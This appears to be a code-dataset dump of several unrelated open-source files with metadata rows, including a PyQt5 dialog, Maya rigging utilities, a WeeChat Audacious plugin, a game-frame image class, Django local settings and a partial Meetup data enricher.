| 0.60714
| false
| 3.84072
| false
| false
| false
|
sealcode/gpandoc
|
ui/recipe_ui.py
|
1
|
3014
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'recipe.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(355, 478)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.vertical_layout_1 = QtWidgets.QVBoxLayout()
self.vertical_layout_1.setObjectName("vertical_layout_1")
self.label_1 = QtWidgets.QLabel(Dialog)
self.label_1.setObjectName("label_1")
self.vertical_layout_1.addWidget(self.label_1)
self.combo_box_1 = QtWidgets.QComboBox(Dialog)
self.combo_box_1.setObjectName("combo_box_1")
self.vertical_layout_1.addWidget(self.combo_box_1)
self.verticalLayout.addLayout(self.vertical_layout_1)
self.vertical_layout_2 = QtWidgets.QVBoxLayout()
self.vertical_layout_2.setObjectName("vertical_layout_2")
self.scroll_1 = QtWidgets.QScrollArea(Dialog)
self.scroll_1.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.scroll_1.setWidgetResizable(True)
self.scroll_1.setObjectName("scroll_1")
self.content_1 = QtWidgets.QWidget()
self.content_1.setGeometry(QtCore.QRect(0, 0, 300, 378))
self.content_1.setMaximumSize(QtCore.QSize(300, 600))
self.content_1.setObjectName("content_1")
self.label_2 = QtWidgets.QLabel(self.content_1)
self.label_2.setGeometry(QtCore.QRect(8, 3, 301, 421))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.scroll_1.setWidget(self.content_1)
self.vertical_layout_2.addWidget(self.scroll_1)
self.button_box_1 = QtWidgets.QDialogButtonBox(Dialog)
self.button_box_1.setOrientation(QtCore.Qt.Horizontal)
self.button_box_1.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.button_box_1.setObjectName("button_box_1")
self.vertical_layout_2.addWidget(self.button_box_1)
self.verticalLayout.addLayout(self.vertical_layout_2)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Wybór przepisu"))
self.label_1.setText(_translate("Dialog", "Lista przepisów:"))
self.label_2.setText(_translate("Dialog", "TextLabel"))
|
lgpl-3.0
| -7,895,148,468,539,092,000
| 47.580645
| 109
| 0.701527
| false
| 3.677656
| false
| false
| false
|
SqueezeStudioAnimation/omtk
|
python/omtk/libs/libPymel.py
|
1
|
14241
|
import logging
import pymel.core as pymel
from maya import OpenMaya
#
# A PyNodeChain is a special pymel-related object that act exactly like a standard array.
# However it allows us to have more bells and whistles.
#
def is_valid_PyNode(val):
return (val and hasattr(val, 'exists') and val.exists()) if val else None
def distance_between_nodes(x, y):
"""
Return the distance between two pynodes.
"""
ax, ay, az = x.getTranslation(space="world")
bx, by, bz = y.getTranslation(space="world")
return ((ax - bx) ** 2 + (ay - by) ** 2 + (az - bz) ** 2) ** 0.5
def distance_between_vectors(a, b):
"""
http://darkvertex.com/wp/2010/06/05/python-distance-between-2-vectors/
"""
return ((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2) ** 0.5
def is_child_of(node, potential_parent):
while node:
if node == potential_parent:
return True
node = node.getParent()
return False
class PyNodeChain(list):
"""A container for manipulating lists of hosts"""
@property
def start(self):
return next(iter(self), None)
@property
def end(self):
return self[-1] if len(self) > 0 else None
@property
def chain(self):
return self
def duplicate(self):
# Hack - Convert self into list even if self is a list to prevent duplicate self parameter in pymel.duplicate
new_chain = pymel.duplicate(list(self), renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def setParent(self, new_parent, **kwargs):
for node in self:
if node != new_parent and node.getParent() != new_parent:
node.setParent(new_parent, **kwargs)
# todo: convert to property?
def length(self):
length = 0
for i in range(len(self) - 1):
head = self[i]
tail = self[i + 1]
length += distance_between_nodes(head, tail)
return length
# get the first pynode that have the attr
def __getattr__(self, key):
logging.warning("Searching unknow attribute {key} in {self}", key=key, self=self)
first_node = next((node for node in self.__dict__['_list'] if hasattr(node, key)), None)
if first_node is not None:
return getattr(first_node, key)
raise AttributeError
# set all the pynodes that have the attr
def __setattr__(self, key, value):
for node in self:
try:
setattr(node, key, value)
except Exception, e:
logging.error(str(e))
def duplicate_chain(chain):
new_chain = pymel.duplicate(chain, renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def get_num_parents(obj):
num_parents = -1
while obj is not None:
obj = obj.getParent()
num_parents += 1
return num_parents
def get_chains_from_objs(objs):
"""
Take an arbitrary collection of joints and sort them into hierarchies represented by lists.
"""
chains = []
objs = sorted(objs, key=get_num_parents)
for obj in objs:
parent = obj.getParent()
if parent not in objs:
chains.append([obj])
else:
for chain in chains:
if parent in chain:
chain.append(obj)
return [PyNodeChain(chain) for chain in chains]
def iter_parents(obj):
while obj.getParent() is not None:
obj = obj.getParent()
yield obj
def get_parents(obj):
return list(iter_parents(obj))
'''
parents = []
while obj.getParent() is not None:
parent = obj.getParent()
parents.append(parent)
obj = parent
return parents
'''
def get_common_parents(objs):
"""
Return the first parent that all provided objects share.
:param objs: A list of pymel.PyNode instances.
:return: A pymel.PyNode instance.
"""
parent_sets = set()
for jnt in objs:
parent_set = set(get_parents(jnt))
if not parent_sets:
parent_sets = parent_set
else:
parent_sets &= parent_set
result = next(iter(reversed(sorted(parent_sets, key=get_num_parents))), None)
if result and result in objs:
result = result.getParent()
return result
class Tree(object):
__slots__ = ('val', 'children', 'parent')
def __init__(self, val):
self.val = val
self.children = []
self.parent = None
def append(self, tree):
self.children.append(tree)
tree.parent = self
def __repr__(self):
return '<Tree {0}>'.format(self.val)
def get_tree_from_objs(objs, sort=False):
"""
Sort all provided objects in a tree fashion.
Supports gaps in the hierarchy (missing intermediate objects).
Note that tree root value will always be None, representing the root node.
"""
dagpaths = sorted([obj.fullPath() for obj in objs])
root = Tree(None)
def dag_is_child_of(dag_parent, dag_child):
return dag_child.startswith(dag_parent + '|')
last_knot = root
for dagpath in dagpaths:
knot = Tree(dagpath)
# Resolve the new knot parent
p = last_knot
while not (p.val is None or dag_is_child_of(p.val, dagpath)):
p = p.parent
p.append(knot)
# Save the last knot, since we are iterating in alphabetical order,
# we can assume that the next knot parent can be found using this knot.
last_knot = knot
return root
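# Illustrative sketch (added commentary, not original omtk code): for objects
# whose full DAG paths are '|a', '|a|b' and '|c' (made-up paths), the result is
#
#   Tree(None)
#   +-- Tree('|a')
#   |   +-- Tree('|a|b')
#   +-- Tree('|c')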
#
# ls() reimplementations
#
def ls(*args, **kwargs):
return PyNodeChain(pymel.ls(*args, **kwargs))
# Wrapper for pymel.ls that return only objects without parents.
def ls_root(*args, **kwargs):
# TODO: Better finding of the root joint
return PyNodeChain(filter(lambda x: x.getParent() is None or type(x.getParent()) != pymel.nt.Joint,
iter(pymel.ls(*args, **kwargs))))
def ls_root_anms(pattern='anm*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_geos(pattern='geo*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_rigs(pattern='rig*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_jnts(pattern='jnt*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
#
# isinstance() reimplementation
#
# Class check for transform PyNodes
def isinstance_of_transform(obj, cls=pymel.nodetypes.Transform):
return isinstance(obj, cls)
# Class check for shape PyNodes
def isinstance_of_shape(obj, cls=pymel.nodetypes.Shape):
if isinstance(obj, pymel.nodetypes.Transform):
return any((shape for shape in obj.getShapes() if isinstance(shape, cls)))
elif isinstance(obj, pymel.nodetypes.Shape):
return isinstance(obj, cls)
def create_zero_grp(obj):
zero_grp = pymel.createNode('transform')
new_name = obj.name() + '_' + 'zero_grp'
zero_grp.rename(new_name)
# Note: Removed for performance
zero_grp.setMatrix(obj.getMatrix(worldSpace=True))
parent = obj.getParent()
if parent:
zero_grp.setParent(parent)
obj.setParent(zero_grp)
return zero_grp
def zero_out_objs(objs):
for o in objs:
create_zero_grp(o)
#
# pymel.datatypes extensions.
#
class Segment(object):
"""
In Maya there's no class to represent a segment.
This is the pymel.datatypes.Segment I've always wanted.
"""
def __init__(self, pos_s, pos_e):
self.pos_s = pos_s
self.pos_e = pos_e
# self.pos_s = numpy.array(pos_s.x, pos_s.y, pos_s.z)
# self.pos_e = numpy.array(pos_e.x, pos_e.y, pos_e.z)
def closest_point(self, p):
"""
http://stackoverflow.com/questions/3120357/get-closest-point-to-a-line
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * (a_to_b_norm) # dot product
dist_norm = atp_dot_atb * ap_length / ab_length
return pymel.datatypes.Vector(
a.x + a_to_b.x * dist_norm,
a.y + a_to_b.y * dist_norm,
a.z + a_to_b.z * dist_norm
)
def closest_point_normalized_distance(self, p, epsilon=0.001):
"""
Same thing as .closest_point but only returns the distance relative to the length of a to b.
Available for optimisation purpose.
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * a_to_b_norm
return (atp_dot_atb * ap_length / ab_length) if abs(ab_length) > epsilon else 0.0
class SegmentCollection(object):
def __init__(self, segments=None):
if segments is None:
segments = []
self.segments = segments
self.knots = [segment.pos_s for segment in self.segments]
self.knots.append(self.segments[-1].pos_e)
def closest_segment(self, pos):
bound_min = -0.000000000001 # Damn float imprecision
bound_max = 1.0000000000001 # Damn float imprecision
num_segments = len(self.segments)
for i, segment in enumerate(self.segments):
distance_normalized = segment.closest_point_normalized_distance(pos)
if bound_min <= distance_normalized <= bound_max:
return segment, distance_normalized
elif i == 0 and distance_normalized < bound_min: # Handle out-of-bound
return segment, 0.0
elif i == (num_segments - 1) and distance_normalized > bound_max: # Handle out-of-bound
return segment, 1.0
raise Exception("Can't resolve segment for {0}".format(pos))
def closest_segment_index(self, pos):
closest_segment, ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
return index, ratio
def get_knot_weights(self, dropoff=1.0, normalize=True):
num_knots = len(self.knots)
knots_weights = []
for i, knot in enumerate(self.knots):
if i == 0:
weights = [0] * num_knots
weights[0] = 1.0
elif i == (num_knots - 1):
weights = [0] * num_knots
weights[-1] = 1.0
else:
weights = []
total_weight = 0.0
for j in range(num_knots):
distance = abs(j - i)
weight = max(0, 1.0 - (distance / dropoff))
total_weight += weight
weights.append(weight)
weights = [weight / total_weight for weight in weights]
knots_weights.append(weights)
return knots_weights
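# Worked example (added commentary, not original omtk code): with four knots
# and dropoff=2.0, each interior knot spreads weight over its neighbours while
# the end knots stay fully pinned:
#
#   knot 0 -> [1.0, 0.0, 0.0, 0.0]
#   knot 1 -> [0.25, 0.5, 0.25, 0.0]
#   knot 2 -> [0.0, 0.25, 0.5, 0.25]
#   knot 3 -> [0.0, 0.0, 0.0, 1.0]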
'''
def get_weights(self, pos, dropoff=1.0, normalize=True):
# Compute the 'SegmentCollection' relative ratio and return the weight for each knots.
closest_segment, relative_ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
absolute_ratio = relative_ratio + index
weights = []
total_weights = 0.0
for segment_ratio in range(len(self.knots)):
#segment_ratio += 0.5 # center of the joint
#print segment_ratio, absolute_ratio
distance = abs(segment_ratio - absolute_ratio)
weight = max(0, 1.0-(distance/dropoff))
# Apply cubic interpolation for greater results.
#weight = interp_cubic(weight)
total_weights += weight
weights.append(weight)
if normalize:
weights = [weight / total_weights for weight in weights]
return weights
'''
@classmethod
def from_transforms(cls, objs):
segments = []
num_objs = len(objs)
for i in range(num_objs - 1):
obj_s = objs[i]
obj_e = objs[i + 1]
mfn_transform_s = obj_s.__apimfn__()
mfn_transform_e = obj_e.__apimfn__()
pos_s = OpenMaya.MVector(mfn_transform_s.getTranslation(OpenMaya.MSpace.kWorld))
pos_e = OpenMaya.MVector(mfn_transform_e.getTranslation(OpenMaya.MSpace.kWorld))
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
@classmethod
def from_positions(cls, positions):
segments = []
num_positions = len(positions)
for i in range(num_positions - 1):
pos_s = positions[i]
pos_e = positions[i + 1]
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
def get_rotation_from_matrix(tm):
"""
Bypass pymel bug
see https://github.com/LumaPictures/pymel/issues/355
"""
return pymel.datatypes.TransformationMatrix(tm).rotate
def makeIdentity_safe(obj, translate=False, rotate=False, scale=False, apply=False, **kwargs):
"""
Extended pymel.makeIdentity method that won't crash for idiotic reasons.
"""
from . import libAttr
affected_attrs = []
# Ensure the shape doesn't have any extra transformation.
if apply:
if translate:
libAttr.unlock_translation(obj)
affected_attrs.extend([
obj.translate, obj.translateX, obj.translateY, obj.translateZ
])
if rotate:
libAttr.unlock_rotation(obj)
affected_attrs.extend([
obj.rotate, obj.rotateX, obj.rotateY, obj.rotateZ
])
if scale:
libAttr.unlock_scale(obj)
affected_attrs.extend([
obj.scale, obj.scaleX, obj.scaleY, obj.scaleZ
])
# makeIdentity will fail if attributes are connected...
with libAttr.context_disconnected_attrs(affected_attrs, hold_inputs=True, hold_outputs=False):
pymel.makeIdentity(obj, apply=apply, translate=translate, rotate=rotate, scale=scale, **kwargs)
|
mit
| 3,718,975,997,942,480,400
| 29.17161
| 117
| 0.59118
| false
| 3.587154
| false
| false
| false
|
microsoft/task_oriented_dialogue_as_dataflow_synthesis
|
src/dataflow/leaderboard/predict.py
|
1
|
2613
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
Semantic Machines\N{TRADE MARK SIGN} software.
Creates the prediction files from onmt_translate output for the leaderboard.
"""
import argparse
from typing import List
import jsons
from more_itertools import chunked
from dataflow.core.dialogue import TurnId
from dataflow.core.io import save_jsonl_file
from dataflow.core.turn_prediction import TurnPrediction
def build_prediction_report_datum(
datum_id_line: str, src_line: str, nbest_lines: List[str],
) -> TurnPrediction:
datum_id = jsons.loads(datum_id_line.strip(), TurnId)
return TurnPrediction(
datum_id=datum_id,
user_utterance=src_line.strip(),
lispress=nbest_lines[0].strip(),
)
def create_onmt_prediction_report(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
):
prediction_report = [
build_prediction_report_datum(
datum_id_line=datum_id_line, src_line=src_line, nbest_lines=nbest_lines,
)
for datum_id_line, src_line, ref_line, nbest_lines in zip(
open(datum_id_jsonl),
open(src_txt),
open(ref_txt),
chunked(open(nbest_txt), nbest),
)
]
save_jsonl_file(prediction_report, "predictions.jsonl")
def main(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
) -> None:
"""Creates 1-best predictions and saves them to files."""
create_onmt_prediction_report(
datum_id_jsonl=datum_id_jsonl,
src_txt=src_txt,
ref_txt=ref_txt,
nbest_txt=nbest_txt,
nbest=nbest,
)
def add_arguments(argument_parser: argparse.ArgumentParser) -> None:
argument_parser.add_argument("--datum_id_jsonl", help="datum ID file")
argument_parser.add_argument("--src_txt", help="source sequence file")
argument_parser.add_argument("--ref_txt", help="target sequence reference file")
argument_parser.add_argument("--nbest_txt", help="onmt_translate output file")
argument_parser.add_argument("--nbest", type=int, help="number of hypos per datum")
if __name__ == "__main__":
cmdline_parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter
)
add_arguments(cmdline_parser)
args = cmdline_parser.parse_args()
print("Semantic Machines\N{TRADE MARK SIGN} software.")
main(
datum_id_jsonl=args.datum_id_jsonl,
src_txt=args.src_txt,
ref_txt=args.ref_txt,
nbest_txt=args.nbest_txt,
nbest=args.nbest,
)
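# Illustrative usage (added commentary, not part of the original script); the
# input file names are assumptions for illustration:
#
#   python -m dataflow.leaderboard.predict \
#       --datum_id_jsonl test.datum_id.jsonl \
#       --src_txt test.src_tok.txt \
#       --ref_txt test.ref.txt \
#       --nbest_txt test.nbest.txt \
#       --nbest 5
#
# This writes the 1-best predictions to predictions.jsonl in the working directory.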
|
mit
| -9,164,045,024,337,558,000
| 30.865854
| 87
| 0.66284
| false
| 3.337165
| false
| false
| false
|
nashgul/weechat
|
audacious_script/audacious.py
|
1
|
3067
|
# audacious now playing for weechat
# nashgul <m.alcocer1978@gmail.com>
# version 0.1
# white => "00", black => "01", darkblue => "02", darkgreen => "03", lightred => "04", darkred => "05", magenta => "06", orange => "07", yellow => "08", lightgreen => "09", cyan => "10", lightcyan => "11", lightblue => "12", lightmagenta => "13", gray => "14", lightgray => "15"
import weechat
import subprocess
weechat.register("audacious_np", "nashgul", "0.01", "GPL2", "now playing for audacious (usage: /audacious)", "", "")
name = 'audacious'
description = 'show now playing for audacious'
hook = weechat.hook_command(name, description, '', '', '', 'now_playing', '')
def get_info_array():
info_list = (['audtool current-song',
'audtool current-song-length',
'audtool current-song-output-length',
'audtool current-song-bitrate-kbps',
'audtool current-song-filename'])
results = []
for x in info_list:
temporal = subprocess.Popen(x, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
b = temporal.stdout.read().splitlines()
results.append(b[0])
return results
def now_playing(datos, channel, args):
colors = {
'white' : '00', 'black' : '01', 'darkblue' : '02', 'darkgreen' : '03',
'lightred' : '04', 'darkred' : '05', 'magenta' : '06', 'orange' : '07',
'yellow' : '08', 'lightgreen' : '09', 'cyan' : '10', 'lightcyan' : '11',
'lightblue' : '12', 'lightmagenta' : '13', 'gray' : '14', 'lightgray' : '15'
}
info_array = get_info_array()
message_color = "%s" % colors['darkblue']
message = u'\x03' + message_color + 'esta reproduciendo' + u'\x0f'
song_color = "%s" % colors['lightred']
song = u'\x03' + song_color + info_array[0] + u'\x0f'
song_filename_color = "%s" % colors['lightred']
song_filename = u'\x03' + song_filename_color + info_array[4] + u'\x0f'
brackets_color = "%s" % colors['yellow']
bracket_1 = u'\x03' + brackets_color + '[' + u'\x0f'
bracket_2 = u'\x03' + brackets_color + ']' + u'\x0f'
hyphen_color = "%s" % colors['yellow']
hyphen = u'\x03' + hyphen_color + ' - ' + u'\x0f'
at_color = "%s" % colors['yellow']
at_sym = u'\x03' + at_color + '@' + u'\x0f'
output_length_color = "%s" % colors['lightblue']
output_length = u'\x03' + output_length_color + info_array[2] + u'\x0f'
length = ''
if info_array[1] != '0:00':
length_color = "%s" % colors['lightblue']
length = u'\x03' + length_color + hyphen + ' ' + info_array[1] + ' ' + u'\x0f'
bitrate_color = "%s" % colors['lightmagenta']
bitrate = u'\x03' + bitrate_color + info_array[3] + ' kbps' + u'\x0f'
string = "%s %s %s%s %s %s" %(bracket_1, output_length, length, at_sym, bitrate, bracket_2)
source = ''
if song_filename.lower().startswith('http'):
source = song_filename
output_string = "%s: %s %s %s" %(message, source, song, string)
weechat.command(channel, "/me %s" % (output_string))
return weechat.WEECHAT_RC_OK
|
gpl-2.0
| -6,693,482,823,102,077,000
| 45.469697
| 278
| 0.573525
| false
| 2.879812
| false
| false
| false
|
SerpentAI/SerpentAI
|
serpent/game_frame.py
|
1
|
5346
|
import skimage.color
import skimage.measure
import skimage.transform
import skimage.filters
import skimage.morphology
import skimage.util  # needed by to_png_bytes (skimage.util.img_as_ubyte)
import numpy as np
import io
from PIL import Image
class GameFrameError(BaseException):
pass
class GameFrame:
def __init__(self, frame_data, frame_variants=None, timestamp=None, **kwargs):
if isinstance(frame_data, bytes):
self.frame_bytes = frame_data
self.frame_array = None
elif isinstance(frame_data, np.ndarray):
self.frame_bytes = None
self.frame_array = frame_data
self.frame_variants = frame_variants or dict()
self.timestamp = timestamp
self.offset_x = kwargs.get("offset_x") or 0
self.offset_y = kwargs.get("offset_y") or 0
self.resize_order = kwargs.get("resize_order") or 1
@property
def frame(self):
return self.frame_array if self.frame_array is not None else self.frame_bytes
@property
def half_resolution_frame(self):
""" A quarter-sized version of the frame (half-width, half-height)"""
if "half" not in self.frame_variants:
self.frame_variants["half"] = self._to_half_resolution()
return self.frame_variants["half"]
@property
def quarter_resolution_frame(self):
""" A sixteenth-sized version of the frame (quarter-width, quarter-height)"""
if "quarter" not in self.frame_variants:
self.frame_variants["quarter"] = self._to_quarter_resolution()
return self.frame_variants["quarter"]
@property
def eighth_resolution_frame(self):
""" A 1/32-sized version of the frame (eighth-width, eighth-height)"""
if "eighth" not in self.frame_variants:
self.frame_variants["eighth"] = self._to_eighth_resolution()
return self.frame_variants["eighth"]
@property
def eighth_resolution_grayscale_frame(self):
""" A 1/32-sized, grayscale version of the frame (eighth-width, eighth-height)"""
if "eighth_grayscale" not in self.frame_variants:
self.frame_variants["eighth_grayscale"] = self._to_eighth_grayscale_resolution()
return self.frame_variants["eighth_grayscale"]
@property
def grayscale_frame(self):
""" A full-size grayscale version of the frame"""
if "grayscale" not in self.frame_variants:
self.frame_variants["grayscale"] = self._to_grayscale()
return self.frame_variants["grayscale"]
@property
def ssim_frame(self):
""" A 100x100 grayscale frame to be used for SSIM"""
if "ssim" not in self.frame_variants:
self.frame_variants["ssim"] = self._to_ssim()
return self.frame_variants["ssim"]
@property
def top_color(self):
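        # Most frequent colour in the eighth-resolution frame, returned as a
        # list of ints (one per channel).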
height, width, channels = self.eighth_resolution_frame.shape
values, counts = np.unique(self.eighth_resolution_frame.reshape(width * height, channels), axis=0, return_counts=True)
return [int(i) for i in values[np.argsort(counts)[::-1][0]]]
def compare_ssim(self, previous_game_frame):
return skimage.measure.compare_ssim(previous_game_frame.ssim_frame, self.ssim_frame)
def difference(self, previous_game_frame):
current = skimage.filters.gaussian(self.grayscale_frame, 8)
previous = skimage.filters.gaussian(previous_game_frame.grayscale_frame, 8)
return current - previous
def to_pil(self):
return Image.fromarray(self.frame)
def to_png_bytes(self):
pil_frame = Image.fromarray(skimage.util.img_as_ubyte(self.frame))
if len(self.frame.shape) == 3:
pil_frame = pil_frame.convert("RGB")
png_frame = io.BytesIO()
pil_frame.save(png_frame, format="PNG", compress_level=3)
png_frame.seek(0)
return png_frame.read()
# TODO: Refactor Fraction of Resolution Frames...
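    # Each helper below resizes with skimage.transform.resize (which returns a
    # float image) and rescales the result back to a 0-255 uint8 array.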
def _to_half_resolution(self):
shape = (
self.frame_array.shape[0] // 2,
self.frame_array.shape[1] // 2
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_quarter_resolution(self):
shape = (
self.frame_array.shape[0] // 4,
self.frame_array.shape[1] // 4
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_grayscale_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.grayscale_frame, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_grayscale(self):
return np.array(skimage.color.rgb2gray(self.frame_array) * 255, dtype="uint8")
def _to_ssim(self):
grayscale = self.grayscale_frame
return skimage.transform.resize(grayscale, (100, 100), mode="reflect", order=0)
|
mit
| -799,488,949,246,343,400
| 31.204819
| 140
| 0.633558
| false
| 3.554521
| false
| false
| false
|
agraubert/agutil
|
agutil/parallel/src/dispatcher.py
|
1
|
2555
|
from .exceptions import _ParallelBackgroundException
from .worker import ThreadWorker, ProcessWorker
from itertools import zip_longest
WORKERTYPE_THREAD = ThreadWorker
WORKERTYPE_PROCESS = ProcessWorker
class IterDispatcher:
def __init__(
self,
func,
*args,
maximum=15,
workertype=WORKERTYPE_THREAD,
**kwargs
):
self.func = func
self.maximum = maximum
self.args = [iter(arg) for arg in args]
self.kwargs = {key: iter(v) for (key, v) in kwargs.items()}
self.worker = workertype
def run(self):
yield from self.dispatch()
def dispatch(self):
self.worker = self.worker(self.maximum)
try:
output = []
for args, kwargs in self._iterargs():
# _args = args if args is not None else []
# _kwargs = kwargs if kwargs is not None else {}
output.append(self.worker.work(
self.func,
*args,
**kwargs
))
for callback in output:
result = callback()
if isinstance(result, _ParallelBackgroundException):
raise result.exc
yield result
finally:
self.worker.close()
def _iterargs(self):
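        # Build one (args, kwargs) tuple per call, drawing a single value from
        # every iterator; stop as soon as any input iterator is exhausted.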
while True:
args = []
had_arg = False
for src in self.args:
try:
args.append(next(src))
had_arg = True
except StopIteration:
return # args.append(None)
kwargs = {}
for key, src in self.kwargs.items():
try:
kwargs[key] = next(src)
had_arg = True
except StopIteration:
return # kwargs[key] = None
if not had_arg:
return
yield args, kwargs
def __iter__(self):
yield from self.dispatch()
def is_alive(self):
return self.worker.is_alive()
class DemandDispatcher:
def __init__(self, func, maximum=15, workertype=WORKERTYPE_THREAD):
self.maximum = maximum
self.func = func
self.worker = workertype(self.maximum)
def dispatch(self, *args, **kwargs):
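        # Submit a single call to the worker pool; if submission fails, close
        # the pool before re-raising.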
try:
return self.worker.work(self.func, *args, **kwargs)
except BaseException:
self.worker.close()
raise
def close(self):
self.worker.close()
|
mit
| 1,826,956,604,685,546,800
| 27.707865
| 71
| 0.508415
| false
| 4.620253
| false
| false
| false
|
juliancantillo/royal-films
|
config/settings/local.py
|
1
|
1950
|
# -*- coding: utf-8 -*-
'''
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
SECRET_KEY = env("DJANGO_SECRET_KEY", default='t3kohnptyzfb7v@s@4dlm2o1356rz&^oamd-y34qat^^69b+s(')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ('127.0.0.1', '10.0.2.2',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
|
mit
| -7,272,907,053,856,914,000
| 30.451613
| 99
| 0.488205
| false
| 4.211663
| false
| false
| false
|
grimoirelab/GrimoireELK
|
grimoire_elk/enriched/meetup.py
|
1
|
13379
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2019 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Alvaro del Castillo San Felix <acs@bitergia.com>
#
import copy
import logging
from grimoirelab_toolkit.datetime import unixtime_to_datetime
from .enrich import Enrich, metadata
from ..elastic_mapping import Mapping as BaseMapping
MAX_SIZE_BULK_ENRICHED_ITEMS = 200
logger = logging.getLogger(__name__)
class Mapping(BaseMapping):
@staticmethod
def get_elastic_mappings(es_major):
"""Get Elasticsearch mapping.
:param es_major: major version of Elasticsearch, as string
:returns: dictionary with a key, 'items', with the mapping
"""
mapping = """
{
"properties": {
"description_analyzed": {
"type": "text",
"index": true
},
"comment": {
"type": "text",
"index": true
},
"venue_geolocation": {
"type": "geo_point"
},
"group_geolocation": {
"type": "geo_point"
}
}
} """
return {"items": mapping}
class MeetupEnrich(Enrich):
mapping = Mapping
def get_field_author(self):
return "author"
def get_identities(self, item):
''' Return the identities from an item '''
item = item['data']
# Creators
if 'event_hosts' in item:
user = self.get_sh_identity(item['event_hosts'][0])
yield user
# rsvps
rsvps = item.get('rsvps', [])
for rsvp in rsvps:
user = self.get_sh_identity(rsvp['member'])
yield user
# Comments
for comment in item['comments']:
user = self.get_sh_identity(comment['member'])
yield user
def get_sh_identity(self, item, identity_field=None):
identity = {'username': None, 'email': None, 'name': None}
if not item:
return identity
user = item
